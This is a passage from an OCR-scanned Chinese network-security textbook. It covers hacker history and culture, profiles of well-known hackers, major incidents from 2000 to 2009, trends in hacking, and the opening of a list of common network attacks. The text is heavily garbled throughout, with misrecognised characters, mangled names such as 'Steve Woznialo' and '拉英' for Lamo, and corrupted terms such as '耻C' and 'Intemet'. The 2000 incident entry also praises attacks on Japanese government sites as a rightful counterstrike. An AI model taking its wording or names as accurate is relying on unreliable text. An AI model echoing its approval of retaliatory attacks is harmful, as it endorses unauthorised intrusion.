客 ， 倡 导 了 一 场 个 人 计算 机 革命 ， 倡 导 了 现行 的 计算 机 开放 式 体系 结构 ， 提 出 了 “计算 机 
为 人 民 所 用 ”的 观点 。 

现在 黑客 使 用 的 侵入 计算 机 系统 的 基本 技巧 ， 如 口令 破解 (password cracking)、 开 天 窗 
(trapdoor)、 留 后 门 (backdoor) 和 植 入 特洛伊 木马 (Trojan horse) 等 ， 都 是 在 这 一 时 期 发 明 的 。 
从 事 黑客 活动 的 经 历 ， 成 为 后 来 许多 计算 机 业 巨 头 简历 上 不 可 或 缺 的 一 部 分 。 例 如 苹果 公 
司 创始 人 之 一 的 乔布斯 就 是 一 个 典型 的 例子 。 

在 20 世纪 60 年 代 ， 计 算 机 的 使 用 远 未 普及 ， 存 储 重要 信息 的 数据 库 只 有 为 数 不 多 的 
几 个 ， 也 谈 不 上 黑客 对 数据 的 非法 复制 等 问题 。 但 到 了 20 世纪 80、90 年 代 ， 计 算 机 越 来 
越 重要 ， 大 型 数据 库 也 越 来 越 多 ， 同 时 ， 信 息 也 越 来 越 集中 在 少数 人 的 手 里 。 这 一 垄断 现 
象 引 起 了 黑客 的 极 大 反感 。 黑 客 认 为 ， 信 息 应 该 是 共享 的 ， 于 是 涉及 各 种 机 密 的 信息 数据 
库 成 了 黑客 注意 的 焦点 。 而 此 时 ， 电 脑 化 空间 已 私有 化 ， 成 为 个 人 财产 ， 黑 客 行 为 必然 会 
和 危害 一 些 人 的 利益 ， 也 会 影响 社会 的 稳定 ， 所 以 需要 利用 法 律 等 手段 来 进行 控制 。 

但 是 , 政府 和 公司 的 管理 者 都 认识 到 了 电脑 安全 的 重要 性 , 他 们 迫切 需要 相关 的 知识 。 
许多 公司 和 政府 机 构 都 邀请 黑客 为 他 们 授课 、 检 验 系统 的 安全 性 ， 甚 至 还 请 他 们 设计 新 的 
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安全 规程 。 在 两 名 黑客 连续 发 现 网 景 公司 设计 的 信用 卡 购物 程序 的 缺陷 并 向 商界 发 出 公告 
之 后 ， 网 景 修正 了 缺陷 并 宣布 举办 名 为 “网 景 缺陷 大 奖 赛 ”的 竞赛 ， 那 些 发 现 和 找到 该 公 
司 产品 中 安全 漏洞 的 黑客 可 获 1000 美元 奖金 。 无 疑 黑客 对 电脑 防护 技术 的 发 展 作出 了 
贡献 。 

今天 ， 黑 客 一 词 已 经 被 用 于 那些 专门 利用 计算 机 进行 破坏 或 入 侵 他 人 计算 机 系统 的 代 
言词 ， 对 这 些 人 正确 的 叫 法 应 该 是 Cracker， 有 人 也 翻译 成 “ 骇 客 ”， 也 正 是 由 于 这 些 人 的 
出 现下 污 了 “黑客 ”一 词 ， 使 人 们 把 黑客 和 骇 客 温 为 一 体 ， 黑 客 被 人 们 认为 是 在 网 络 上 进 
行 修 坏 的 人 。 由 于 目前 这 两 个 词语 已 经 被 普遍 混 用 为 “黑客 ”, 所 以 再 强调 “黑客 ”和 “ 骇 
客 ” 已 无 实际 意义 。 

2. 黑客 的 含义 


所 谓 黑客 ， 是 指 利用 通讯 软件 ， 通 过 网 络 非法 进入 他 人 计算 机 系统 ， 获 取 或 自 改 各 种 
数据 ,危害 信息 安全 的 入 侵 者 或 入 侵 行为 。 在 日 本 《新 黑客 词典 》 中 ， 对 黑客 的 定义 是 “ 喜 
欢 探 索 软件 程序 奥秘 , 并 从 中 增长 了 其 个 人 才干 的 人 。 他 们 不 像 绝 大 多 数 电脑 使 用 者 那样 ， 
只 规 规矩 窍 地 了 解 别 人 指定 了 解 的 狭小 部 分 知识 ”。 在 《中 华人 民 共 和 国 公 共 安 全 行业 标 
准 》(GA 163 一 1997) 中 ， 黑 客 被 定义 为 “对 计算 机 系统 进行 非 授权 访问 的 人 员 ”。 这 也 是 
目前 大 多 数 人 对 黑客 的 理解 。 


2.1.2 黑客 文化 


很 多 黑客 对 计算 机 和 编程 的 强烈 兴趣 成 了 他 们 与 人 沟通 的 障碍 ， 他 们 的 社交 能 力 普 过 
较 低 。 

黑客 们 充分 利用 互联 网 跟 那 些 兴 趣 相同 的 人 成 为 朋友 和 伙伴 。 在 互联 网 还 不 是 很 普及 
的 时 候 ， 黑 客 们 通过 访问 他 们 自己 建立 的 留言 板 系 统 (BBS)， 来 与 其 他 黑客 联系 。 黑 客 可 以 
将 BBS 放 在 自己 的 计算 机 上 ， 让 人 们 登录 系统 去 发 送 消 息 、 共 享 信息 、 玩 游戏 以 及 下 载 
程序 。 

20 世纪 90 年 代 ， 美 国立 法 部 门 的 官员 认为 黑客 问题 是 个 巨大 的 安全 威胁 。 当 时 大 约 
有 数 百名 黑客 可 以 随意 入 侵 世 界 上 最 安全 的 系统 。 

有 关 黑 客 技术 的 专门 网 站 有 很 多 。 黑 客 刊物 《2600: 黑客 季刊 》 就 有 自己 的 专门 网 站 ， 
该 网 站 有 黑客 专题 的 实时 播报 。 而 其 印刷 版 则 可 以 在 报刊 亭 买 到 。 如 Hack.org 这 样 的 网 站 ， 
在 帮助 黑客 们 学 习 技术 的 同时 ， 又 提供 各 种 测试 题目 和 竞赛 供 黑客 们 锻炼 自己 的 技能 。 
并 不 是 所 有 的 黑客 都 希望 能 侵入 禁止 进入 的 计算 机 系统 。 一 些 黑客 运用 自身 的 天 赋 和 
0 识 来 开发 更 好 的 软件 ， 以 及 安全 措施 。 事 实 上 ， 很 多 曾经 利用 他 们 的 技术 来 侵入 系统 的 
黑客 ， 现 在 都 将 他 们 的 才能 用 在 开发 更 全 面 的 安全 措施 上 了 。 从 某 种 程度 上 说 ， 互 联网 就 
是 不 同 黑客 之 间 的 一 个 战场 一 一 恶意 黑客 ， 或 者 称 为 “ 黑 帽子 ”的 那些 人 ， 都 是 企图 侵入 
系统 或 者 传播 病毒 的 黑客 ， 而 好 的 黑客 ， 也 就 是 被 称 为 “ 白 帽 子 ” 的 那些 人 ， 则 是 帮助 提 
升 系统 的 安全 性 能 ， 并 开发 强大 的 防毒 软件 的 人 。 

黑客 都 支持 开放 源 代 码 软件 ， 这 些 程序 的 源 代 码 可 供 任何 人 学 习 、 复 制 、 发 布 以 及 修 
改 。 有 了 这 种 开放 源 代 码 软件 ， 他 们 可 以 相互 交流 、 学 习 并 帮助 改良 该 程序 。 此 类 程序 可 
以 是 简单 的 应 用 程序 ， 也 可 以 是 复杂 的 操作 系统 (如 Linux)。 


黑客 们 有 很 多 年 度 活动 。 例 如 在 拉 斯 维 加 斯 每 年 都 举行 名 为 DEFCON 的 年 会 , 数 干 参 
与 者 聚集 到 一 起 交流 关于 编程 的 经 验 、 进 行 竞赛 、 参 加 黑客 技术 与 计算 机 发 展 的 讨论 等 ， 
这 都 使 得 黑客 们 的 好 奇 心得 到 了 极 大 满足 。 另 一 个 称 为 混沌 交流 工作 营 的 活动 是 指 将 低 技 
含量 的 生活 方式 和 高 技术 含量 的 讨论 和 活动 结合 起 来 。 


2.1.3 ”知名 黑客 


史 带 夫 。 乔 布 斯 和 斯 带 芬 ， 沃 兹 尼克 是 苹果 公司 创始 人 ， 他 们 都 是 黑客 。 他 们 早期 的 
一 些 活动 很 像 一 些 恶 意 黑客 的 行为 。 但 是 ， 乔 布 斯 和 沃 兹 尼克 超越 了 恶意 行为 ， 开 始 专 心 
开发 计算 机 硬件 和 软件 。 他 们 的 努力 开辟 了 个 人 电脑 的 时 代 。 

李 纳 斯 ， 托 沃 兹 是 Linux 之 父 ， 是 一 名 正直 的 著名 黑客 。 在 黑客 圈 里 ，Linux 系统 非常 
受 欢迎 。 托 沃 兹 促进 了 开放 源 代码 软件 观念 的 形成 ， 向 人 们 证 明了 只 要 你 向 所 有 人 公开 信 
息 ， 你 就 可 以 收获 不 可 思议 的 财富 。 

理 查 德 。 斯 托 尔 曼 ， 人 称 RMS， 是 自由 软件 运动 、GNU 计划 和 自由 软件 基金 的 创始 
人 。 他 促进 了 免费 软件 和 自由 访问 计算 机 理念 的 推广 。 同 时 他 与 一 些 组 织 (如 免费 软件 基金 
会 ) 一 起 合作 ， 反 对 诸如 数字 版 权 管理 这 样 的 政策 。 

乔纳森 *， 人 詹姆斯 ， 他 在 16 岁 的 时 候 成 为 首位 被 监禁 的 青少年 黑客 ， 并 因此 恶名 远 传 。 
他 曾经 入 侵 过 很 多 著名 组 织 的 站 点 ， 包 括 美 国 国防 部 下 设 的 国防 威胁 降低 局 (DTRA)。 通 过 
此 次 黑客 行动 ， 他 捕获 了 用 户 名 和 密码 ， 并 浏览 高 度 机 密 的 电子 邮件 。 人 詹姆斯 还 曾 入 侵 过 
美国 宇航 局 的 计算 机 ， 并 窃 走 价值 170 万 美元 的 软件 。 据 美国 司法 部 长 称 ， 他 所 窃取 的 软 
件 主要 用 于 维护 国际 空间 站 的 物理 环境 ， 包 括 对 湿度 和 温度 的 控制 。 当 人 詹姆斯 的 入 侵 行为 
被 发 现 后 ， 美 国 宇航 局 被 迫 关闭 了 整个 计算 机 系统 ， 并 因此 花费 了 纳税 人 的 4.1 万 美元 。 
目前 ， 詹 姆 斯 正 计 划 成 立 一 家 计算 机 安全 公司 。 

凯 文 。 米 特 尼克 ， 在 20 世纪 80 年 代 他 可 谓 是 恶名 昭著 ，17 岁 的 时 候 他 潜入 了 北美 空 
中 防御 指挥 部 NORAD)。 美 国 司法 部 曾经 将 米 特 尼 克 称 为 “美国 历史 上 被 通缉 的 头号 计算 
机 罪犯 ”, 他 的 所 作 所 为 已 经 被 记录 在 两 部 好 莱 坞 电影 中 , 分 别 是 《Takedown》 和 《Freedom 
Downtime》。 米 特 尼克 最 初 破解 了 洛杉矶 公交 车 打卡 系统 ， 因 此 他 得 以 免费 乘 车 。 在 此 之 
后 ， 他 也 同 苹果 联合 创始 人 斯 蒂 芬 。 沃 兹 尼克 (Steve Woznialo 一 样 ， 试 图 盗 打 电话 。 米 特 
尼克 首次 被 判 有 罪 是 因为 非法 侵入 Digital Equipment 公司 的 计算 机 网 络 ， 并 窃取 软件 。 之 
后 的 两 年 半 时 间 里 ， 米 特 尼克 展开 了 疯狂 的 黑客 行动 。 他 开始 侵入 他 人 计算 机 系统 、 破 坏 
电话 网 络 、 窃 取 公司 商业 秘密 ， 并 最 终 冯 入 了 美国 国防 部 预警 系统 。 后 来 ， 他 因为 入 侵 计 
算 机 专家 、 黑 客 Tsutomu Shimomura 的 家 用 计算 机 而 落网 。 在 长 达 5 年 零 8 个 月 的 单独 监 
禁 之 后 ， 米 特 尼克 现在 的 身份 是 一 位 计算 机 安全 专家 、 顾 问 和 演讲 者 。 

凯 文 ， 鲍 尔 森 ， 也 叫 “ 黑 瞳 但 丁 ”， 他 因 非 法 入 侵 洛 杉 矶 KIIS-FM 电话 线路 而 闻名 全 
美 ， 同 时 也 因此 获得 了 一 辆 保时捷 汽车 。 美 国联 邦 调查 局 (FBD 也 曾 追 查 鲍 尔 森 ， 因 为 他 韶 
入 了 FBI 数据 库 和 联邦 计算 机 ， 目 的 是 获取 敏感 信息 。 鲍 尔 森 的 专长 是 入 侵 电 话 线路 ， 他 
经 常 占 据 一 个 基站 的 全 部 电话 线路 。 鲍 尔 森 还 经 常 重新 激活 黄页 上 的 电话 号 码 ， 并 提供 给 
自己 的 伙伴 用 于 出 售 。 他 最 终 在 一 家 超市 被 撒 ， 并 被 处 以 五 年 监禁 。 在 监狱 服刑 期 间 ， 鲍 
尔 森 担任 了 《Wired》 杂 志 的 记者 ， 并 升任 高 级 编辑 。 
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阿 德里 安 。 拉 黄 ， 他 热衷 入 侵 各 大 公司 的 内 部 网 络 ， 比 如 微软 公司 等 。 他 喜欢 利用 咖 
啡 店 、 复 印 店 或 图 书馆 的 网 络 来 从 事 黑客 行为 ， 因 此 获得 了 一 个 “不 回 家 的 黑客 ”的 绰号 。 
拉 莫 经 常 能 发 现 安全 漏洞 ， 并 对 其 加 以 利用 。 通 常情 况 下 ， 他 会 通知 企业 有 关 漏 洞 的 信息 。 
在 拉 莫 的 入 侵 名 单 上 包括 雅虎 、 花 旗 银 行 、 美 洲 银行 和 Cingular 等 知名 公司 。 由 于 侵入 《 纽 
约 时 报 》 内 部 网 络 ， 拉 英 成 为 顶尖 数码 罪犯 之 一 。 也 正 是 因为 这 一 罪行 ， 他 被 处 以 6.5 万 
美元 罚款 ， 以 及 6 个 月 家 庭 禁 闭 和 两 年 缓刑 。 拉 英 现 在 是 一 位 闭 名 公共 发 言 人 ， 同 时 还 是 
一 名 获奖 记者 。 

如 今 网 络 中 活跃 着 数 千 名 黑客 ， 人 们 无 法 得 知 到 底 有 多 少 人 。 很 多 黑客 并 没有 真正 意 
识 到 自己 行为 的 后 果 ， 他 们 在 用 一 些 他 们 自己 并 没完 全 了 解 的 工具 进行 着 各 种 非法 的 活动 。 

还 有 些 黑客 对 自己 的 行为 认识 的 相当 清楚 ， 以 至 于 他 们 可 以 自由 出 入 计算 机 系统 而 从 未 被 
发 觉 。 


2.1.4 近 10 年 著名 黑客 事件 


年 仅 15 岁 ， 绰 号 “黑手 党 男孩 ”的 黑客 在 2000 年 2 月 6 日 ~2 月 14 日 情人 节 期 间 成 
功 侵入 包括 雅虎 、eBay 和 Amazon 在 内 的 大 型 网 站 服务 器 ， 他 成 功 阻止 服务 器 向 用 户 提供 
服务 ， 他 于 同年 被 捕 。 

2000 年 ， 日 本 右翼 势力 在 大 阪 集会 ， 称 南京 大 屠杀 是 “20 世纪 最 大 谎言 ”， 公 然 为 南 
京 大 屠杀 翻案 ， 在 中 国政 府 和 南京 等 地 的 人 民 抗 议 的 同时 ， 内 地 和 海外 华人 黑客 多 次 进攻 
日 本 网 站 ， 用 实际 行动 回击 日 本 右翼 的 丑行 ， 据 日 本 媒体 报道 ， 日 本 总 务 厅 和 科技 厅 的 网 
站 被 迫 关闭 ， 日 本 政要 对 袭击 浪潮 表示 遗憾 。 

2001 年 5 月 ， 中 美 黑客 网 络 大 战 。 中 美 撞 机 事件 发 生 后 ， 中 美 黑客 之 间 发 生 的 网 络 大 
战 愈演愈烈 。 自 2001 年 4 月 4 日 以 来 ,美国 黑客 组 织 PoizonBOx 不 断 袭 击 中 国 网 站 。 对 
此 ， 我 国 的 网 络 安全 人 员 积 极 防 备 美方 黑客 的 攻击 。 中 国 一 些 黑客 组 织 则 在 “五 一 ”期 间 
打响 了 “黑客 反击 战 ”! 

2002 年 11 月 ， 伦 敦 某 黑客 在 英国 被 指控 侵入 美国 军 方 90 多 个 电脑 系统 。 

2006 年 10 月 16 日 ， 中 国 黑 客 whboy( 李 俊 ) 发 布 熊猫 烧香 木马 ， 并 在 很 短 的 时 间 内 ， 
致使 中 国 数 百 万 用 户 受 到 感染 ， 并 波及 到 周边 国家 。 他 于 2007 年 2 月 12 日 被 捕 。 

2007 年 4 月 27 日 ， 爱 沙 尼 亚 拆除 苏 军纪 念 碑 以 来 ， 该 国 总 统 和 议会 的 官方 网 站 、 政 
府 各 大 部 门 网 站 、 政 党 网 站 的 访问 量 就 突然 激增 ， 服 务 器 由 于 过 于 拥挤 而 陷于 瘫痪 。 全 国 
6 大 新 闻 机 构 中 有 3 家 遭 到 攻击 ， 此 外 还 有 两 家 全 国 最 大 的 银行 和 多 家 从 事 通讯 业务 的 公 
司 网 站 遭 到 攻击 。 爱 沙 尼 亚 的 网 络 安 全 专家 表示 ， 根 据 网 址 来 判断 ， 虽 然 攻击 点 分 布 在 世 
界 各 地 ， 但 大 部 分 来 自 俄罗斯 ， 甚 至 有 些 来 自 俄 政府 机 构 ， 这 在 初期 表现 尤为 显著 。 其 中 
一 名 组 织 进攻 的 黑客 高 手 甚 至 可 能 与 俄罗斯 安全 机 构 有 关联 。《 卫 报 》 指 出 ， 如 果 俄 罗斯 
当局 被 证 实在 幕后 策划 了 这 次 黑客 攻击 ， 那 将 是 第 一 起 国家 对 国家 的 “网 络 战 ”。 俄 罗斯 
驻 布鲁塞尔 大 使 奇 若 夫 表示 : “假如 有 人 暗示 攻击 来 自 俄罗斯 或 俄 政府 ， 这 是 一 项 非常 严 
重 的 指控 ， 必 须 拿 出 证 据 。 

2007 年 ， 俄 罗斯 黑客 成 功 劫持 Windows Update 下 载 器 。 根 据 Symantec 研究 人 员 En 
息 ， 他 们 发 现 已 经 有 黑客 动 持 了 BITS， 可 以 自由 控制 用 户 下 载 更 新 的 内 容 ， 而 BITS 是 
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全 被 操作 系统 安全 机 制 信任 的 服务 ， 连 防火 墙 都 没有 任何 警觉 。 这 意味 着 利用 BITS， 黑 客 
可 以 很 轻松 地 把 恶意 内 容 以 合法 的 手段 下 载 到 用 户 的 电脑 并 执行 。Symantec 的 研究 人 员 同 
时 表示 ， 目 前 他 们 发 现 的 黑客 正 尝试 劫持 ， 还 没有 将 恶意 代码 写 入 ， 也 没有 准备 好 提供 给 
用 户 的 “ 货 ”， 但 提醒 用 户 要 提高 警惕 。 

2008 年 ， 一 个 全 球 性 的 黑客 组 织 ， 利 用 ATM 欺诈 程序 在 一 夜 之 间 从 世界 49 个 城市 
的 银行 中 盗 走 了 900 万 美元 。 黑 客 们 攻破 的 是 一 种 名 为 RBS WorldPay 的 银行 系统 ， 用 各 
种 手段 盗 取 了 数据 库 内 的 银行 卡 信息 ， 并 在 11 月 8 日 午夜 ， 利 用 团伙 作案 从 世界 49 个 城 
市 总 计 超过 130 台 ATM 机 上 提取 了 900 万 美元 。 此 案 到 目前 仍 未 侦破 ， 甚 至 连 一 个 嫌疑 
人 还 没 找到 。 

2009 年 7 月 7 日 ,韩国 遭受 有 史 以 来 最 猛烈 的 一 次 攻击 。 韩 国 总 统 府 、 国 会 、 国 情 院 
和 国防 部 等 国家 机 关 ， 以 及 金融 界 、 媒 体 和 防火 墙 企 业 网 站 都 遭受 了 黑客 的 攻击 。9 日 埋 
国 国家 情报 院 和 国民 银行 网 站 无 法 被 访问 。 韩 国 国 会 、 国 防 部 、 外 交通 商 部 等 机 构 的 网 站 
一 度 无 法 打开 ! 这 是 韩国 遭遇 的 有 史 以 来 最 强 的 一 次 黑客 攻击 。 


2.1.5 黑客 行为 的 发 展 趋势 


回顾 历次 发 生 的 黑客 事件 ， 我 们 可 以 发 现 黑客 发 展 的 五 大 趋势 : 黑客 组 织 化 、 黑 客 技 
术 工 具 化 、 黑 客 普及 化 、 黑 客 年 轻 化、 黑客 破坏 力 扩大 化 。 

1. 黑客 组 织 化 

由 于 黑客 的 破坏 ， 人 们 的 网 络 安全 意识 开始 增强 ， 计 算 机 产品 的 安全 性 被 放 在 很 重要 
的 位 置 ， 漏 洞 和 缺陷 越 来 越 少 ， 新 的 强 有 力 的 计算 机 安全 技术 及 安全 产品 也 如 雨后春笋 般 
出 现 ， 由 于 网 络 安 全 知识 的 普及 ， 人 为 的 失误 和 错误 也 越 来 越 少 。 另 外 ， 反 黑客 的 措施 也 
更 有 力 更 得 力 了 ， 由 于 上 述 种 种 因素 , 黑客 开始 由 原来 的 单 兵 作战 变 成 有 组 织 的 黑客 群体 。 
在 黑客 组 织 内 部 ， 成 员 之 间 相互 交流 技术 经 验 ， 共 同 采 取 黑 客 行动 ， 成 功率 很 高 ， 影 响 力 
也 很 大 。 

2. 黑客 技术 的 工具 化 、 智 能 化 

黑客 事件 越 来 越 多 的 一 个 重要 原因 就 是 黑客 工具 越 来 越 多 ， 并 且 越 来 越 容易 获得 ， 据 
中 国 科 学 院 许 榕 生 研 究 员 介绍 ， 黑 客运 用 的 软件 工具 已 超过 1000 种 。 在 互联 网 上 ， 有 大 量 
的 黑客 站 点 ， 很 多 站 点 都 有 大 量 的 黑客 工具 供用 户 下 载 ， 借 助 黑 客 工具 ， 有 些 黑 客 攻击 甚 
至 不 需要 太 多 计算 机 知识 就 能 实施 ， 如 典型 的 Windows“ 蓝 屏 炸 弹 ” 和 IISCrasher， 只 要 
知道 被 攻击 者 的 卫 ， 就 能 实施 有 效 的 攻击 。 

黑客 工具 的 主要 来 源 有 如 下 几 种 。 

(1) 很 多 网 络 安全 工具 可 以 当 作 黑客 工具 来 使 用 。 同 样 是 扫描 器 ， 网 络 管理 员 可 以 用 
它 来 检查 系统 漏洞 ， 防 患 于 未 然 ， 黑客 也 可 以 用 它 来 寻找 攻击 入 口 ,为 实施 攻击 做 好 准备 ， 
另外 还 有 很 多 常用 的 网 络 工 具 也 能 当 作 黑客 工具 来 用 ， 如 Telnet、Ftp 等 。 

(2) 黑客 开发 的 工具 。 黑 客 工具 一 部 分 是 为 了 简化 攻击 ， 便 于 攻击 ， 根 据 黑 客 经 验 开 
发 的 ， 如 很 多 用 于 口令 攻击 ， 密 码 破解 的 黑客 工具 。 另 一 部 分 是 不 断 发 现 的 网 络 漏洞 和 缺 
陷 导 致 黑客 技术 的 不 断 出现 ， 这 些 黑客 技术 被 迅速 工具 化 ， 另 外 有 的 黑客 为 了 证 明 自 己 的 
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能 力 开发 出 一 部 分 强 有 力 的 黑客 工具 ， 如 特洛伊 木马 程序 BO、NETBUS 等 。 

现在 黑客 工具 的 编写 者 采用 了 比 以 前 更 加 先进 、 更 加 智能 的 技术 ， 具 有 明显 的 智能 化 
特征 。 攻 击 工具 的 特征 码 越 来 越 难以 通过 分 析 来 发 现 ， 也 越 来 越 难以 通过 基于 特征 码 的 检 
测 系统 发 现 ， 而 且 现 在 的 攻击 工具 也 具备 了 相当 的 反 检 测 智 能 分 析 能 力 。 主 要 表现 在 以 下 
三 个 方面 。 

@ 反 检 测 技术 。 

攻击 者 采用 了 能 够 隐藏 攻击 工具 的 技术 ， 这 使 得 安全 专家 通过 各 种 分 析 方 法 来 判断 新 
的 攻击 的 过 程 变 得 更 加 困难 。 

@ 动态 行为 。 

以 前 的 攻击 工具 按照 预定 的 单一 步骤 发 起 进攻 ， 现 在 的 自动 攻击 工具 能 够 按照 不 同 的 
方法 更 改 它 们 的 特征 ， 如 随机 选择 预定 的 决策 路 径 ， 或 者 通过 入 侵 者 直接 控制 。 

@ 攻击 工具 的 模块 化 。 

和 以 前 的 攻击 工具 仅仅 实现 一 种 攻击 相 比 ， 新 的 攻击 工具 能 够 通过 升级 或 者 对 部 分 模 
块 的 替换 完成 快速 更 改 。 而 且 ， 攻 击 工具 能 够 在 越 来 越 多 的 平台 上 运行 。 例 如 ， 许 多 攻击 
工具 采用 了 标准 的 协议 ， 如 耻 C 和 HTTP 进行 数据 和 命令 的 传输 ， 这 样 ， 想 要 从 正常 的 网 
络 流量 中 分 析出 攻击 特征 就 更 加 困难 了 。 

3. 黑客 技术 普及 化 

黑客 组 织 的 形成 和 黑客 工具 的 大 量 出 现 导 致 的 一 个 直接 后 果 就 是 黑客 技术 的 普及 ， 虽 
然 在 市 面 上 可 能 看 不 到 一 本 介绍 如 何 做 黑客 、 传 授 黑客 技术 的 书 ， 但 是 在 Intemet 上 ， 黑 客 
与 黑客 组 织 办 的 传授 黑客 技术 的 站 点 却 比比 缘 是 。 这 些 黑客 站 点 提供 黑客 工具 、 公 布 系统 
漏洞 、 公 开 传 授 黑客 技术 和 进行 黑客 教学 等 ， 甚 至 还 有 网 上 论坛 、 网 上 聊天 ， 相 互 交流 黑 
客 技术 经 验 ， 协 调 黑客 行动 。 黑 客 事件 的 剧 增 、 黑 客 组 织 规模 的 扩大 、 黑 客站 点 的 大 量 涌 
现 ， 也 说 明了 黑客 技术 开始 普及 ， 甚 至 很 多 十 多 岁 的 年 轻 人 也 有 了 自己 的 黑客 站 点 ， 如 广 
州 的 耀 华 黑客 站 点 。 从 很 多 BBS 上 也 可 以 看 出 学 习 探 讨 黑客 技术 的 人 也 越 来 越 多 ， 我 们 可 
以 禁止 有 害 书 籍 刊物 的 传播 ， 却 难以 禁止 Intemet 上 有 害 信 息 的 传播 交流 。 

黑客 技术 普及 化 的 原因 有 以 下 三 个 方面 。 

(1) 黑客 组 织 的 形成 ， 使 黑客 的 人 数 迅速 扩大 ， 如 美国 的 “大 屠杀 2600” 的 成 员 就 曾 
达到 150 万 人 ， 这 些 黑客 组 织 还 提供 大 量 的 黑客 工具 ， 使 掌握 黑客 技术 的 人 数 剧 增 。 

(2) 黑客 站 点 的 大 量 出 现 。 通过 Intemet 任何 人 都 能 访问 到 这 些 站 点 , 学 习 黑 客 技 术 也 
不 再 是 一 件 困难 的 事 。 

(3) 计算 机 教育 的 普及 ， 使 很 多 人 在 学 习 黑 客 技术 上 不 再 存在 太 多 的 专业 障碍 。 

应 当 指 出 ， 黑 客 技 术 并 不 是 很 神秘 的 ， 它 也 是 计算 机 技术 的 一 种 ， 对 黑客 技术 的 适当 
了 解 是 很 有 必要 的 ， 这 样 才能 做 到 知己 知 彼 、 百 战 不 残 ， 事 实 上 ， 很 多 网 络 安 全 专家 就 十 
分 精通 黑客 技术 ， 甚 至 有 些 还 是 从 黑客 转化 来 的 。 黑 客 技术 的 工具 化 和 普及 化 ， 也 产生 了 
一 个 让 我 们 深 感 忧虑 的 后 果 一 一 黑客 的 年 轻 化 。 

4. 黑客 年 轻 化 


由 于 中 国 互联 网 的 普及 ， 形 成 全 球 一 体 化 ， 甚 至 连 很 多 偏远 的 地 方 也 可 以 从 网 络 上 接 
触 到 世界 各 地 的 信息 资源 ， 所 以 越 来 越 多 对 黑客 感 兴趣 的 中 学 生 , 也 已 经 踏足 到 这 个 领域 。 


有 资料 统计 , 我国 计算 机 犯罪 者 主要 是 19 一 30 岁 的 男性 , 平均 年 龄 约 为 23 岁 , 而 央视 《中 
国法 制 报道 》 则 将 这 个 年 龄 降低 到 19 岁 。 这 种 现象 反映 出 我 们 的 网 络 监管 及 相关 法 律 部 门 
的 管理 还 存在 着 极 大 的 漏洞 。 

一 桩 又 一 桩 龙 动 性 黑客 事件 的 主角 都 是 一 些 年 轻 人 ， 为 什么 现在 年 轻 的 黑客 越 来 越 
多 ? 究 其 原因 ， 有 多 方面 的 因素 在 起 作用 : 第 一 ， 计 算 机 教育 在 许多 国家 的 普及 使 青少年 
的 计算 机 水 平 提高 很 快 ， 各 国 的 政府 和 教育 管理 机 构 都 大 力 提倡 教师 应 用 现代 教育 技术 手 
段 进行 教学 ， 要 使 每 个 学 生 都 会 使 用 电脑 ; 第 二 ， 黑 客 技 术 的 普及 和 黑客 工具 的 大 量 出 现 ， 
使 青少年 更 容易 学 习 与 掌握 黑客 技术 ， 青 少年 的 好 奇 心 和 模仿 能 力 强 ， 求 知 欲 和 表现 欲 旺 
盛 ， 但 自制 力 、 判 断 力 却 很 弱 ， 法 制 观念 淡薄 ， 在 学 习 黑 客 技术 后 ， 很 容易 把 网 络 作为 施 
展 才 能 的 场所 ; 第 三 ， 有关 Intemet 的 法 律 和 法 规 还 不 很 健全 ,发 现 黑客 也 有 相当 的 技术 难 
度 ， 很 多 黑 站 点 出 于 种 种 考虑 ， 不 敢 承认 被 黑 事 实 ， 使 很 多 黑客 事件 不 了 了 之 ， 使 小 黑客 
们 有 和 尾 无 束 ， 第 四 ， 青 少年 的 网 络 道德 教育 还 是 一 片 空白 ， 黑 客 行为 是 存在 于 网 络 虚拟 世 
界 里 的 ， 它 不 同 于 平常 可 见 的 不 良 行为 ， 大 多 数学 校 与 家 庭 对 青少年 的 网 上 恶作剧 行为 根 
本 无 法 判别 ， 更 别 说 教育 了 。 另 外 ， 与 论 总 把 黑客 描 成 神出鬼没 、 反 叛 、 天 才 的 形象 ， 甚 
至 说 是 网 络 时 代 的 牛仔 ， 计 算 机 时 代 的 英雄 ， 这 也 很 容易 给 青少年 造成 误导 。 

5. 黑客 的 破坏 力 扩大 化 

随 着 Intemet 的 高 速 发 展 ， 政 府 、 军 事 、 银 行 、 邮 电 、 企 业 和 教育 等 部 门 纷纷 接 入 互联 
网 ， 电 子 商 务 也 在 蓬勃 发 展 ， 全 社会 对 互联 网 的 依赖 性 日 益 增 加 ， 黑 客 的 破坏 力也 日 益 扩 
大 化 。2009 年 6 月 2 日， 公安 部 发 布 消息 称 ， 造 成 5 月 19 日 中 国 六 省 市 互联 网 大 面积 瘫 
痪 、 一 手 炮制 “暴风 断 网 门 ” 的 4 名 黑客 已 经 落网 。 沸 沸 扬 扬 的 “ 断 网 事件 ” 告 一 段落 ， 
但 一 条 “黑色 产业 链 ” 因 “暴风 断 网 门 ”而 浮 出 水 面 。 有 数据 显示 ， 目 前 ， 我 国 黑客 产业 
链 已 达 10 亿 多 元 规模 ， 其 破坏 性 则 至 少 达到 数 百 亿 元 。 


2.2 ”常见 的 网 络 攻击 


网 络 攻击 日 益 成 为 旨 在 窃取 金钱 的 职业 犯罪 行为 。 虽 然 人 们 过 去 一 直 认为 病毒 作者 和 
黑客 只 是 一 些 令 人 讨厌 的 机 人 敏 少年 ， 但 是 目前 最 流行 病毒 和 黑客 技巧 与 技术 都 已 经 被 更 高 
级 的 犯罪 分 子 所 掌握 。 

如 果 没 有 适当 的 安全 措施 和 安全 的 访问 控制 方法 ， 在 网 络 上 传输 的 数据 很 容易 受到 各 
式 各 样 的 攻击 。 网 络 攻击 既 有 被 动 型 的 ， 也 有 主动 型 的 。 被 动 攻击 通常 指 信息 受到 非法 侦 
听 ， 而 主动 攻击 则 往往 意味 着 对 数据 甚至 网 络 本 身 恶 意 的 自 改 和 破坏 。 以 下 列举 几 种 常见 
的 网 络 攻击 类 型 。 

1. 窃听 

一 般 情 况 下 ， 绝 大 多 数 网 络 通信 都 以 一 种 不 安全 的 “明文 ”形式 进行 ， 这 就 给 攻击 者 
很 大 的 机 会 ， 只 要 获取 数据 通信 路 径 ， 就 可 轻易 “ 侦 听 ”或 者 “解读 ”明文 数据 流 。“ 侦 
听 ” 型 攻击 者 ， 虽 然 不 破坏 数据 ， 却 可 能 造成 通信 信息 外 泄 ， 甚 至 危及 敏感 数据 安全 。 对 
于 多 数 普通 企业 来 说 , 这 类 网 络 窃听 行为 已 经 构成 了 网 管 员 所 面临 的 最 大 的 网 络 安全 问题 。 
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2. 算 改 数据 

